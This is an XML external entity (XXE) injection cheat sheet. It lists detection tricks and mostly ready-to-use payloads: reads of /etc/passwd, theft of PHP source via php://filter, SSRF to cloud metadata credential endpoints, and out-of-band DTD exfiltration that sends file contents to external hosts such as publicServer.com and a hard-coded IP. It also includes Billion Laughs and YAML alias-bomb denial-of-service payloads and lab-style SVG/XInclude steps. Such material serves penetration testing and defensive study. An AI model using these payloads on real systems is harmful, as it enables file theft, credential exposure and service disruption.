XXE

Summary

XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to read files on the application server's filesystem and to interact with any backend or external systems that the application itself can reach (SSRF). Entity expansion can also be abused for denial of service (see "Billion Laughs" below), and on PHP targets the php:// and expect:// stream wrappers widen what an external entity can reach.
Detection:
# Change the Content-Type from "application/json" or "application/x-www-form-urlencoded" to "application/xml" and re-encode the body as XML — many frameworks content-negotiate on the header and will hand the body to an XML parser.
# If file uploads accept docx/xlsx/pptx (OOXML) or other zip-packaged XML formats, unzip the package, add your XXE payload to one of the inner XML files and re-zip it. PDF is not a zip container, so this trick does not apply to it directly.
# If SVG is accepted as an image upload, inject the DOCTYPE/entity payload into the SVG — it is XML and is frequently parsed server-side (resizing, sanitizing, rendering). See the SVG payloads below.
# If the web app consumes RSS/Atom feeds, put your malicious DOCTYPE into a feed you control.
# Fuzz for /soap endpoints; some applications still expose SOAP APIs, which are XML by definition.
# If the target offers SSO, SAML requests/responses are XML — inject the payload there (the message is usually base64-encoded, and some SAML libraries reject any DTD before the entity is expanded, so a silent failure is not conclusive).
Check (harmless internal entity — confirms the parser expands entities before you try any file read):
<?xml version="1.0"?>
<!DOCTYPE a [<!ENTITY test "THIS IS A STRING!">]>
<methodCall><methodName>&test;</methodName></methodCall>
If the string is reflected, the parser expands entities; try an external (SYSTEM) entity next:
<?xml version="1.0"?>
<!DOCTYPE a[<!ENTITY test SYSTEM "file:///etc/passwd">]>
<methodCall><methodName>&test;</methodName></methodCall>

Tools

# https://github.com/BuffaloWill/oxml_xxe
# https://github.com/enjoiz/XXEinjector

Attacks

# Get PHP source (php://filter base64-encodes the file so PHP tags do not break the XML; decode the reflected value — PHP backends only):
<?xml version="1.0"?>
<!DOCTYPE a [<!ENTITY test SYSTEM "php://filter/convert.base64-encode/resource=index.php">]>
<methodCall><methodName>&test;</methodName></methodCall>
# XXE via the PHP data:// wrapper (the base64 decodes to file:///etc/passwd) — useful against filters that block the literal "file://"; requires a PHP backend whose parser honors stream wrappers, and what the parser does with the decoded text depends on the backend.
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
# Check if entities are enabled (internal entity only, no file access):
<!DOCTYPE replace [<!ENTITY test "pentest"> ]>
<root>
<xxe>&test;</xxe>
</root>
# XXE LFI (note: "(#ANY)" is not valid DTD syntax — use "<!ELEMENT foo ANY>" as in the later payloads if the parser is strict about the DTD):
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>
# XXE blind LFI — NOTE: a parameter-entity reference (%xxe;) inside an entity declaration is forbidden in the internal DTD subset by the XML spec and most parsers reject it; in practice the declaration has to live in an external DTD on your host (see the OOB payloads below). Multi-line files also break the URL.
<!DOCTYPE foo [
<!ELEMENT foo (#ANY)>
<!ENTITY % xxe SYSTEM "file:///etc/passwd">
<!ENTITY blind SYSTEM "https://www.example.com/?%xxe;">]><foo>&blind;</foo>
# XXE access-control bypass — the server fetches the URL itself, so IP/VPN-restricted resources become readable; php://filter base64-encodes the response so it survives as entity content (PHP backends only):
<!DOCTYPE foo [
<!ENTITY ac SYSTEM "php://filter/read=convert.base64-encode/resource=http://example.com/viewlog.php">]>
<foo><result>&ac;</result></foo>
# XXE to SSRF (cloud metadata) — "admin" is an example role name; request .../security-credentials/ first to list the real one. On AWS with IMDSv2 enforced this plain GET fails because a session token obtained via PUT is required:
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin"> ]>
# XXE OOB — remote.dtd on your host must declare the "send" entity (template in the Yunusov payload below); the parser must be allowed to make outbound HTTP requests:
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://your.host/remote.dtd">
%dtd;]>
<data>&send;</data>
# PHP wrapper inside XXE — the base64 of index.php is reflected wherever the <name> field is echoed back:
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<contacts>
<contact>
<name>Jean &xxe; Dupont</name>
<phone>00 11 22 33 44</phone>
<adress>42 rue du CTF</adress>
<zipcode>75000</zipcode>
<city>Paris</city>
</contact>
</contacts>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=http://10.0.0.3" >
]>
<foo>&xxe;</foo>
# Denial of Service – Billion Laughs (entity expansion). This variant is only 4 levels deep (10^4 copies of "dos"); the classic version nests ~9 levels and can exhaust a vulnerable parser's memory — only run it with explicit authorization.
<!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<data>&a4;</data>
# YAML alias bomb — not XXE, but the same exponential-expansion DoS against YAML parsers that resolve anchors/aliases eagerly:
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
# XXE OOB attack (Yunusov, 2013) — the parameter entity is declared in an external DTD, which is why this works where the "blind LFI" payload above does not. /sys/power/image_size is chosen because it is a single short value that fits in a URL; multi-line files need the base64 variant below.
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
<data>&send;</data>
File stored on http://publicServer.com/parameterEntity_oob.dtd (the exfiltrated value arrives as a query string in your web server's access log):
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
%all;
# XXE OOB with external DTD and PHP filter — base64-encoding the file keeps newlines and special characters out of the exfiltration URL (PHP backends only); large files may exceed URL-length limits on your listener:
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://92.222.81.2/dtd.xml">
%sp;
%param1;
]>
<r>&exfil;</r>
File stored on http://92.222.81.2/dtd.xml (replace the IP with your own listener in both the payload and the DTD):
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://92.222.81.2/dtd.xml?%data;'>">
# XXE inside SOAP — the CDATA section carries the DOCTYPE as text, so it only fires if the backend later parses that string as XML; pointing the DTD at port 22 (or another non-HTTP port) gives an error/timing signal even when nothing is reflected:
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
# XXE PoC — the same payload in three forms (bare, with an XML declaration, with an ELEMENT declaration) for parsers that are picky about the prolog:
<!DOCTYPE xxe_test [ <!ENTITY xxe_test SYSTEM "file:///etc/passwd"> ]><x>&xxe_test;</x>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe_test [ <!ENTITY xxe_test SYSTEM "file:///etc/passwd"> ]><x>&xxe_test;</x>
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE xxe_test [<!ELEMENT foo ANY><!ENTITY xxe_test SYSTEM "file:///etc/passwd">]><foo>&xxe_test;</foo>
# XXE via SVG file upload — the first line is only a fragment (the "xxe" entity must be declared in a DOCTYPE, as in the full SVG below); expect:// needs the non-default PHP expect extension, so it rarely works:
<svg>&xxe;</svg>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
<image xlink:href="expect://ls"></image>
</svg>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><svg width="512px" height="512px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="14" x="0" y="16">&xxe;</text></svg>
# Hidden XXE attack surface (works even where you cannot submit a DOCTYPE yourself)
- XInclude (use when you only control a fragment that the server embeds into its own XML document; the parser must have XInclude processing enabled):
Visit a product page, click "Check stock", and intercept the resulting POST request in Burp Suite.
Set the value of the productId parameter to:
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>
- File uploads (SVG is XML, so an image upload that is rendered server-side parses your DOCTYPE):
Create a local SVG image with the following content:
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
Post a comment on a blog post, and upload this image as an avatar.
When you view your comment, you should see the contents of /etc/hostname rendered inside the image. Then use the "Submit solution" button.

Mindmap
